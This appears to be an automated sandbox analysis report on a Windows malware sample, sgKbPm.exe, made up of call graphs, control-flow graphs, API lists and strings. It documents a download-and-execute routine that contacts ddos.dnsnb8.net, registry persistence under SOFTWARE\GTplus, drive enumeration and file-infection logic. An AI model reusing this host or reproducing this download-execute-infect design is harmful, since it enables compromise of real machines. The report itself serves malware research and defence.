CloseHandle 1283->1285 1286 c511f7 CloseHandle 1284->1286 1287 c511f6 1284->1287 1285->1070 1286->1285 1287->1286 1289 c51310 1288->1289 1290 c5123f GetCurrentProcessId OpenProcess 1288->1290 1289->1068 1297 c51319 1289->1297 1290->1289 1295 c51262 1290->1295 1291 c512b0 VirtualAlloc 1292 c512b8 1291->1292 1291->1295 1293 c512f1 CloseHandle 1292->1293 1293->1289 1294 c51302 VirtualFree 1293->1294 1294->1289 1295->1291 1295->1292 1295->1293 1296 c51296 VirtualFree 1295->1296 1296->1291 1298 c5134a 1297->1298 1299 c5132a GetModuleHandleA GetProcAddress 1297->1299 1300 c51351 memset 1298->1300 1301 c51363 1298->1301 1299->1298 1299->1301 1300->1301 1301->1068 1301->1076 1302->1089 1304 c510ba 1303->1304 1305 c51196 1303->1305 1304->1305 1321 c5185b GetSystemTimeAsFileTime srand rand srand rand 1304->1321 1307 c51118 wsprintfA wsprintfA URLDownloadToFileA 1308 c510dc 1307->1308 1309 c51168 lstrlen Sleep 1307->1309 1312 c51000 CreateFileA 1308->1312 1309->1304 1313 c51025 GetFileSize CreateFileMappingA MapViewOfFile 1312->1313 1314 c51092 WinExec lstrlen 1312->1314 1315 c51057 1313->1315 1316 c5107b 1313->1316 1314->1304 1314->1305 1317 c51074 UnmapViewOfFile 1315->1317 1318 c51061 1315->1318 1319 c51087 CloseHandle 1316->1319 1320 c5108d CloseHandle 1316->1320 1317->1316 1318->1317 1319->1320 1320->1314 1321->1307 1323 c52361 1324 c52374 1323->1324 1325 c5236b UnmapViewOfFile 1323->1325 1326 c52382 1324->1326 1327 c52379 CloseHandle 1324->1327 1325->1324 1328 c52388 CloseHandle 1326->1328 1329 c52391 1326->1329 1327->1326 1328->1329 1330 c56158 VirtualFree 1338 c560c7 1330->1338 1331 c56198 VirtualFree 1340 c561b2 1331->1340 1332 c560d5 VirtualAlloc 1332->1338 1333 c56389 VirtualProtect 1337 c563b7 1333->1337 1334 c563fc VirtualProtect 1336 c56418 1334->1336 1335 c5615f VirtualFree 1335->1338 1337->1334 1339 c563e7 VirtualProtect 1337->1339 1338->1331 1338->1332 1338->1335 1339->1334 1339->1337 1340->1333 1341 c562fb 1340->1341

                              Callgraph

                              • Executed
                              • Not Executed
                              • Opacity -> Relevance
                              • Disassembly available
                              callgraph 0 Function_00C52845 3 Function_00C5274A 0->3 38 Function_00C52692 0->38 39 Function_00C5239D 0->39 1 Function_00C52C48 19 Function_00C51973 1->19 31 Function_00C52B8C 1->31 2 Function_00C566C8 24 Function_00C56A84 2->24 29 Function_00C56D00 2->29 30 Function_00C56B02 2->30 8 Function_00C5185B 3->8 3->19 4 Function_00C517D0 5 Function_00C5235D 6 Function_00C5605E 7 Function_00C56158 7->2 9 Function_00C514E1 22 Function_00C51AF9 9->22 53 Function_00C51638 9->53 10 Function_00C52361 46 Function_00C52D9B 10->46 11 Function_00C52D60 12 Function_00C56B63 47 Function_00C567A4 12->47 49 Function_00C56834 12->49 51 Function_00C569B0 12->51 13 Function_00C529E2 52 Function_00C528B8 13->52 14 Function_00C51E6E 14->8 14->11 15 Function_00C51C68 14->15 17 Function_00C51DF6 14->17 14->22 26 Function_00C51C81 14->26 34 Function_00C51D8A 14->34 35 Function_00C51B8A 14->35 37 Function_00C51915 14->37 14->46 16 Function_00C56076 16->2 18 Function_00C52CF0 19->8 20 Function_00C56CF2 23 Function_00C56CF8 20->23 21 Function_00C52B7D 21->13 22->53 24->20 32 Function_00C5680F 24->32 25 Function_00C56001 36 Function_00C5600A 25->36 27 Function_00C51581 27->8 28 Function_00C51000 28->4 29->12 29->20 29->51 30->12 31->0 31->21 33 Function_00C5120E 35->8 39->13 39->37 40 Function_00C5189D 39->40 41 Function_00C5119F 42 Function_00C5139F 42->33 42->41 44 Function_00C51319 42->44 43 Function_00C51099 43->8 43->28 45 Function_00C51718 45->18 48 Function_00C565A6 50 Function_00C56734 50->24 50->29 50->30 52->13 52->14 52->38 52->39 53->1 53->4 53->27 53->42 53->43 53->45

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                              • String ID: %s*$C:\$Documents and Settings
                              • API String ID: 2826467728-110786608
                              • Opcode ID: 78fd40d552075fed05bd2ff73ac51809fe2d280a0e2e7a20edf69990d90728c8
                              • Instruction ID: 20fff416cdb7d5af190a9fae93f159df69d234ae8542ceae0c3ab1837ec45b28
                              • Opcode Fuzzy Hash: 78fd40d552075fed05bd2ff73ac51809fe2d280a0e2e7a20edf69990d90728c8
                              • Instruction Fuzzy Hash: 0A41A4B6404389AFD721DBA0DC48EDF77ECEB85346F040829F945D3051E630D68C97A6

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 172 c51099-c510b4 173 c51199-c5119c 172->173 174 c510ba-c510c7 172->174 175 c510c8-c510d4 174->175 176 c51184-c51190 175->176 177 c510da 175->177 176->175 179 c51196-c51198 176->179 178 c51113-c51162 call c5185b wsprintfA * 2 URLDownloadToFileA 177->178 182 c510dc-c5110d call c51000 WinExec lstrlen 178->182 183 c51168-c51182 lstrlen Sleep 178->183 179->173 182->178 182->179 183->176 183->178
                              APIs
                                • Part of subcall function 00C5185B: GetSystemTimeAsFileTime.KERNEL32(00C51F92,00000000,?,00000000,?,?,?,00C51F92,?,00000000,00000002), ref: 00C51867
                                • Part of subcall function 00C5185B: srand.MSVCRT ref: 00C51878
                                • Part of subcall function 00C5185B: rand.MSVCRT ref: 00C51880
                                • Part of subcall function 00C5185B: srand.MSVCRT ref: 00C51890
                                • Part of subcall function 00C5185B: rand.MSVCRT ref: 00C51894
                              • WinExec.KERNEL32(?,00000005), ref: 00C510F1
                              • lstrlen.KERNEL32(00C54748), ref: 00C510FA
                              • wsprintfA.USER32 ref: 00C5112A
                              • wsprintfA.USER32 ref: 00C51143
                              • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00C5115B
                              • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00C51169
                              • Sleep.KERNEL32 ref: 00C51179
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                              • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                              • API String ID: 1280626985-685328806
                              • Opcode ID: 296b883d9663a7b8c660cfe3aa570a352db11cd2dc634b1aa85d587d79f3b854
                              • Instruction ID: 3ae8e0aed726a0f55ee0078e58c855d38276cb8e1e1da1559c0af9de602c36ff
                              • Opcode Fuzzy Hash: 296b883d9663a7b8c660cfe3aa570a352db11cd2dc634b1aa85d587d79f3b854
                              • Instruction Fuzzy Hash: 16218D7D800348BADB249BA0DC49BAFBBBCAB0535BF150095E900A2051D7745BC8CF64

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 216 c51718-c51733 GetSystemTimeAsFileTime 217 c51735-c51752 SHSetValueA 216->217 218 c51754-c51758 216->218 219 c517c6-c517cd 217->219 218->219 220 c5175a-c51784 SHGetValueA 218->220 220->219 221 c51786-c517b3 call c52cf0 * 2 220->221 221->219 226 c517b5 221->226 227 c517b7-c517bd 226->227 228 c517bf 226->228 227->219 227->228 228->219
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\sgKbPm.exe), ref: 00C51729
                              • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00C5174C
                              • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00C5177C
                              • __aulldiv.LIBCMT ref: 00C51796
                              • __aulldiv.LIBCMT ref: 00C517A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: TimeValue__aulldiv$FileSystem
                              • String ID: C:\Users\user\AppData\Local\Temp\sgKbPm.exe$SOFTWARE\GTplus$Time
                              • API String ID: 541852442-761027960
                              • Opcode ID: b01e0f8ff96348222253aa1e7eb5752c42f01b565f368eb0e07ab6fb4035c7ff
                              • Instruction ID: dc1528bd45b4567ae0379a9270cd2d1b0b7e4f06cb8cb232e8cb905be9dd1a5f
                              • Opcode Fuzzy Hash: b01e0f8ff96348222253aa1e7eb5752c42f01b565f368eb0e07ab6fb4035c7ff
                              • Instruction Fuzzy Hash: AF119679A00209BBDB109AA4CC89FEF7BBCEB44B96F108025FD10B6141D6749B88C768

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 229 c56076-c56079 230 c560e0-c560eb 229->230 231 c5607b-c56080 229->231 232 c560ee-c560f4 230->232 233 c560f7-c560f8 231->233 234 c56082-c56085 231->234 235 c560f6 232->235 236 c560fe-c56106 233->236 237 c560fa-c560fc call c566c8 233->237 234->235 238 c56087 234->238 235->233 240 c56155-c56189 VirtualFree 236->240 241 c56108-c5611d 236->241 237->236 238->232 242 c56089-c56095 238->242 249 c5618c-c56192 240->249 246 c5611f-c56121 241->246 243 c56097-c5609f 242->243 244 c560a1-c560aa 242->244 243->244 247 c560b0-c560c1 VirtualAlloc 244->247 248 c561ba-c561c8 244->248 250 c56151-c56154 246->250 251 c56123 246->251 252 c560c7-c560cf 247->252 254 c56243-c56251 248->254 255 c561ca-c561d7 248->255 249->252 253 c56198-c561b0 VirtualFree 249->253 250->240 251->250 256 c56125-c56128 251->256 252->249 259 c560d5-c560df VirtualAlloc 252->259 253->248 262 c561b2-c561b4 253->262 260 c56264-c5626f 254->260 261 c56253 254->261 263 c561dd-c561e0 255->263 257 c56134-c5613b 256->257 258 c5612a-c5612e 256->258 269 c56130-c56132 257->269 270 c5613d-c5614f 257->270 258->257 258->269 259->230 267 c56271-c56276 260->267 266 c56255-c56258 261->266 262->248 263->254 268 c561e2-c561f2 263->268 266->260 271 c5625a-c56262 266->271 272 c5627c-c56289 267->272 273 c56389-c563b1 VirtualProtect 267->273 274 c561f5-c561fe 268->274 269->246 270->246 271->266 284 c56292-c56298 272->284 285 c5628b 272->285 275 c563b7-c563ba 273->275 276 c56200-c56203 274->276 277 c5620c-c56219 274->277 280 c563fc-c56416 VirtualProtect 275->280 281 c563bc-c563c2 275->281 278 c56205-c56208 276->278 279 c5621b-c56228 276->279 282 c56238-c5623f 277->282 286 c5622a-c56236 278->286 287 c5620a 278->287 279->282 290 c56420-c56425 280->290 291 c56418-c5641d 280->291 281->281 289 c563c4 281->289 282->274 288 c56241 282->288 292 c562a2-c562ac 284->292 285->284 286->282 287->282 288->263 289->280 293 c563c6-c563cf 289->293 294 c562b1-c562c8 292->294 295 c562ae 292->295 296 c563d4-c563d8 293->296 297 c563d1 293->297 298 c56373-c56384 294->298 299 c562ce-c562d4 294->299 295->294 300 c563dd-c563e1 296->300 301 c563da 296->301 297->296 298->267 302 c562d6-c562d9 299->302 303 c562da-c562f1 299->303 304 c563e7-c563fa VirtualProtect 300->304 305 c563e3 300->305 301->300 302->303 307 c56365-c5636e 303->307 308 c562f3-c562f9 303->308 304->275 304->280 305->304 307->292 309 c56314-c56326 308->309 310 c562fb-c5630f 308->310 312 c5634c-c56360 309->312 313 c56328-c5634a 309->313 311 c56426-c564a9 310->311 322 c56519-c5651c 311->322 323 c564ab-c564c0 311->323 312->311 313->307 325 c56583-c56587 322->325 326 c5651d-c5651e 322->326 328 c56535-c56537 323->328 329 c564c2 323->329 330 c56588-c5658b 325->330 327 c56522-c56533 326->327 327->328 333 c56539 328->333 334 c5659a 328->334 335 c564c5-c564cd 329->335 336 c564f8 329->336 331 c565a1-c565a3 330->331 332 c5658d-c5658f 330->332 337 c56591-c56593 332->337 338 c565b4 333->338 339 c5653b-c56541 333->339 340 c5659b-c5659d 334->340 341 c56542-c56545 335->341 342 c564cf-c564d4 335->342 343 c5656c-c5656f 336->343 344 c564fa-c564fe 336->344 337->340 345 c56595 337->345 350 c565be-c565db 338->350 339->341 340->337 346 c5659f 340->346 347 c5654d-c56550 341->347 348 c56517-c56518 342->348 349 c564d6-c564d9 342->349 351 c56572 343->351 344->351 352 c56500 344->352 345->334 346->330 347->350 353 c56552-c56556 347->353 348->322 349->347 354 c564db-c564f5 349->354 355 c565dd-c565f6 350->355 356 c56573-c56576 351->356 352->327 357 c56502 352->357 358 c56578-c5657a 353->358 359 c56558-c56569 353->359 354->336 360 c565f7-c56608 355->360 356->358 357->356 361 c56504-c56513 357->361 358->355 362 c5657c 358->362 359->343 361->328 363 c56515 361->363 362->360 364 c5657e-c5657f 362->364 363->348 364->325
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00C560BE
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00C560DF
                              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00C56189
                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00C561A5
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: b7d4e7f7687f156b457d9069aaa7b533ae9731471169aef8325426128c32863e
                              • Instruction ID: 4ab05368d37abf44b93ec6bcb29423b22983e6833c2cc18d92bdabbd640394bd
                              • Opcode Fuzzy Hash: b7d4e7f7687f156b457d9069aaa7b533ae9731471169aef8325426128c32863e
                              • Instruction Fuzzy Hash: 2C1267B65087848FDB328F24CC45BEA7BB0EF02311F98059DDC958B1A3D774AA89C758

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 365 c52b8c-c52bc6 memset GetLogicalDriveStringsA 366 c52c09-c52c28 WaitForMultipleObjects 365->366 367 c52bc8-c52bcc 365->367 368 c52c3c-c52c45 366->368 369 c52c2a-c52c3a CreateThread 366->369 370 c52bce-c52bd0 367->370 371 c52bfa-c52c07 lstrlen 367->371 369->368 370->371 372 c52bd2-c52bdc GetDriveTypeA 370->372 371->366 371->367 372->371 373 c52bde-c52be1 372->373 373->371 374 c52be3-c52bf6 CreateThread 373->374 374->371
                              APIs
                              • memset.MSVCRT ref: 00C52BA6
                              • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00C52BB4
                              • GetDriveTypeA.KERNEL32(?), ref: 00C52BD3
                              • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00C52BEE
                              • lstrlen.KERNEL32(?), ref: 00C52BFB
                              • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00C52C16
                              • CreateThread.KERNEL32(00000000,00000000,00C52845,00000000,00000000,00000000), ref: 00C52C3A
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                              • String ID:
                              • API String ID: 1073171358-0
                              • Opcode ID: c924233cbb3744285a99097024915a8e775c3512ba8b92473d328870f69752cb
                              • Instruction ID: fc09b50ad76331296e788ba10321b0e89a6bbffbc68d43c20fee533258efcde6
                              • Opcode Fuzzy Hash: c924233cbb3744285a99097024915a8e775c3512ba8b92473d328870f69752cb
                              • Instruction Fuzzy Hash: 5021DBB980039CAFE7209F649C84FAF7BBDFB4535AB140125FC52A2151D7609ECACB64

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 16 c51e6e-c51e95 call c52d60 19 c51e97 call c51d8a 16->19 20 c51e9c-c51eaa call c51df6 16->20 19->20 24 c51eb0-c51ed9 SetFileAttributesA CreateFileA 20->24 25 c52332 20->25 24->25 27 c51edf-c51f28 call c51915 SetFilePointer CreateFileMappingA MapViewOfFile 24->27 26 c52338-c5233b 25->26 28 c52346-c52349 26->28 29 c5233d-c52340 UnmapViewOfFile 26->29 27->25 34 c51f2e-c51f39 27->34 31 c52350-c52354 28->31 32 c5234b-c5234e CloseHandle 28->32 29->28 35 c52356-c5235b CloseHandle 31->35 36 c52391-c5239a call c52d9b 31->36 32->31 34->25 37 c51f3f-c51f56 34->37 35->36 37->25 39 c51f5c-c51f64 37->39 39->25 41 c51f6a-c51f70 39->41 41->25 42 c51f76-c51f87 call c51c81 41->42 42->25 45 c51f8d-c51fa7 call c5185b call c51c81 42->45 45->25 50 c51fad-c51fb4 45->50 51 c52024-c52045 50->51 52 c51fb6-c51fc5 call c51af9 50->52 51->25 53 c5204b-c5204e 51->53 52->51 59 c51fc7-c51fd2 52->59 55 c52070-c520f4 call c51af9 * 2 call c51c68 * 2 memset * 2 53->55 56 c52050-c52053 53->56 78 c520f5-c520fe 55->78 60 c52056-c5205a 56->60 59->25 62 c51fd8-c51fe7 59->62 60->55 63 c5205c-c52061 60->63 65 c51fef-c52006 call c51af9 62->65 66 c51fe9-c51fec 62->66 63->25 67 c52067-c5206e 63->67 73 c52013-c5201e FlushViewOfFile 65->73 74 c52008-c5200e call c51c68 65->74 66->65 67->60 73->51 74->73 79 c52130-c52139 78->79 80 c52100-c52114 78->80 83 c5213c-c52142 79->83 81 c52116-c5212a 80->81 82 c5212d-c5212e 80->82 81->82 82->78 84 c52144-c52150 83->84 85 c5215c 83->85 87 c52157-c5215a 84->87 88 c52152-c52154 84->88 86 c5215f-c52162 85->86 89 c52164-c52171 86->89 90 c52181-c52184 86->90 87->83 88->87 91 c52177-c5217e 89->91 92 c5232a-c5232d 89->92 93 c52186 90->93 94 c5218d-c521ba call c51c68 90->94 91->90 92->86 93->94 97 c521d3-c5220b call c51c81 call c51c68 94->97 98 c521bc-c521d0 call c51c68 94->98 105 c5220d-c52218 call c51c68 97->105 106 c5221b-c5221e 97->106 98->97 105->106 108 c52226-c5231a memcpy UnmapViewOfFile CloseHandle call c51b8a call c5185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call c51915 106->108 109 c52220-c52223 106->109 116 c5231f-c52328 CloseHandle 108->116 109->108 116->26
                              APIs
                              • SetFileAttributesA.KERNEL32(?,00000080,?,00C532B0,00000164,00C52986,?), ref: 00C51EB9
                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00C51ECD
                              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00C51EF3
                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00C51F07
                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00C51F1D
                              • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00C5201E
                              • memset.MSVCRT ref: 00C520D8
                              • memset.MSVCRT ref: 00C520EA
                              • memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C5222D
                              • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C52238
                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C5224A
                              • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C522C6
                              • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C522CB
                              • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C522DD
                              • WriteFile.KERNEL32(000000FF,00C54008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C522F7
                              • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C5230D
                              • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00C52322
                              • UnmapViewOfFile.KERNEL32(?,?,00C532B0,00000164,00C52986,?), ref: 00C52340
                              • CloseHandle.KERNEL32(?,?,00C532B0,00000164,00C52986,?), ref: 00C5234E
                              • CloseHandle.KERNEL32(000000FF,?,00C532B0,00000164,00C52986,?), ref: 00C52359
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                              • String ID:
                              • API String ID: 3043204753-0
                              • Opcode ID: 513e0b24cb2cdf8d7a8fae29f1bf28ce6bfd38975b6809937cb42c9adec871da
                              • Instruction ID: 9ceabb72fc93a20b67bcd9a747e1c9fbc3308c5ae0b5407c04da906ecdff58fe
                              • Opcode Fuzzy Hash: 513e0b24cb2cdf8d7a8fae29f1bf28ce6bfd38975b6809937cb42c9adec871da
                              • Instruction Fuzzy Hash: 7DF15979900208EFCB24DFA4DC85AADBBB5FF09316F104529E919A72A1D730AEC5CF54

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 117 c51973-c5199a PathFileExistsA 118 c51ac7-c51acc 117->118 119 c519a0-c519aa 117->119 120 c51ad0-c51ad5 118->120 121 c51ace 118->121 122 c519af-c519c2 CreateFileA 119->122 125 c51ad7-c51ad9 120->125 126 c51af0-c51af6 120->126 121->120 123 c519c4-c519d3 Sleep 122->123 124 c51a28-c51a36 GetFileSize 122->124 123->122 127 c519d5-c51a0b call c5185b wsprintfA CopyFileA 123->127 128 c51a87-c51a8b 124->128 129 c51a38-c51a3b 124->129 125->126 127->124 141 c51a0d-c51a26 CreateFileA 127->141 132 c51a96-c51a9a 128->132 133 c51a8d-c51a90 CloseHandle 128->133 129->128 131 c51a3d-c51a51 VirtualAlloc 129->131 131->128 135 c51a53-c51a57 131->135 136 c51aad-c51ab1 132->136 137 c51a9c 132->137 133->132 142 c51a80 135->142 143 c51a59-c51a6d ReadFile 135->143 139 c51ab3-c51ab6 136->139 140 c51adb-c51ae0 136->140 138 c51aa0-c51aa7 DeleteFileA 137->138 138->136 139->118 144 c51ab8-c51ac1 VirtualFree 139->144 146 c51ae7-c51aec 140->146 147 c51ae2-c51ae5 140->147 141->124 145 c51a9e 141->145 142->128 143->128 148 c51a6f-c51a7e 143->148 144->118 145->138 146->126 149 c51aee 146->149 147->146 148->142 148->143 149->126
                              APIs
                              • PathFileExistsA.SHLWAPI(00C54E5C,00000000,C:\Users\user\AppData\Local\Temp\sgKbPm.exe), ref: 00C51992
                              • CreateFileA.KERNEL32(00C54E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00C519BA
                              • Sleep.KERNEL32(00000064), ref: 00C519C6
                              • wsprintfA.USER32 ref: 00C519EC
                              • CopyFileA.KERNEL32(00C54E5C,?,00000000), ref: 00C51A00
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C51A1E
                              • GetFileSize.KERNEL32(00C54E5C,00000000), ref: 00C51A2C
                              • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00C51A46
                              • ReadFile.KERNEL32(00C54E5C,00C54E60,00000000,?,00000000), ref: 00C51A65
                              • CloseHandle.KERNEL32(000000FF), ref: 00C51A90
                              • DeleteFileA.KERNEL32(?), ref: 00C51AA7
                              • VirtualFree.KERNEL32(00C54E60,00000000,00008000), ref: 00C51AC1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2433341991.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000001.00000002.2433329254.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433368827.0000000000C54000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.2433382542.0000000000C56000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_c50000_sgKbPm.jbxd
                              Similarity
                              • API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
                              • String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\sgKbPm.exe
                              • API String ID: 716042067-3008294092
                              • Opcode ID: c6b0c69e3851f5d143d4235f9b3f3c7889131fcc3a1e85d7dc525a91d1b1a741
                              • Instruction ID: 99075ebecf7f32ae2af2bbb7efbe60178522176585b9f1f484dc590a1777dada
                              • Opcode Fuzzy Hash: c6b0c69e3851f5d143d4235f9b3f3c7889131fcc3a1e85d7dc525a91d1b1a741
                              • Instruction Fuzzy Hash: 05515075901259AFCB129F94CC88BAEBBB8EB04356F144569FD25A6190C3309F84DB54

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 150 c528b8-c528ff memset wsprintfA 151 c52905-c5290d 150->151 152 c529db-c529df 150->152 151->152 153 c52913-c52919 151->153 154 c52956-c52965 strrchr 153->154 155 c5291b-c5294c memset wsprintfA call c529e2 153->155 154->152 157 c52967-c52978 lstrcmpiA 154->157 158 c52951 155->158 159 c52988-c52992 lstrcmpiA 157->159 160 c5297a-c52981 call c51e6e 157->160 158->152 159->152 161 c52994-c5299b 159->161 165 c52986 160->165 163 c529ad-c529c9 strstr 161->163 164 c5299d-c529a3 161->164 167 c529d3-c529d6 call c52692 163->167 168 c529cb-c529d1 call c5239d 163->168 164->163 166 c529a5-c529a7 lstrcpy 164->166 165->152 166->163 167->152 168->152
                              APIs
                              • memset.MSVCRT ref: 00C528D3
                              • wsprintfA.USER32 ref: 00C528F7
                              • memset.MSVCRT ref: 00C52925
                              • wsprintfA.USER32 ref: 00C52940
                                • Part of subcall function 00C529E2: memset.MSVCRT ref: 00C52A02
                                • Part of subcall function 00C529E2: wsprintfA.USER32 ref: 00C52A1A
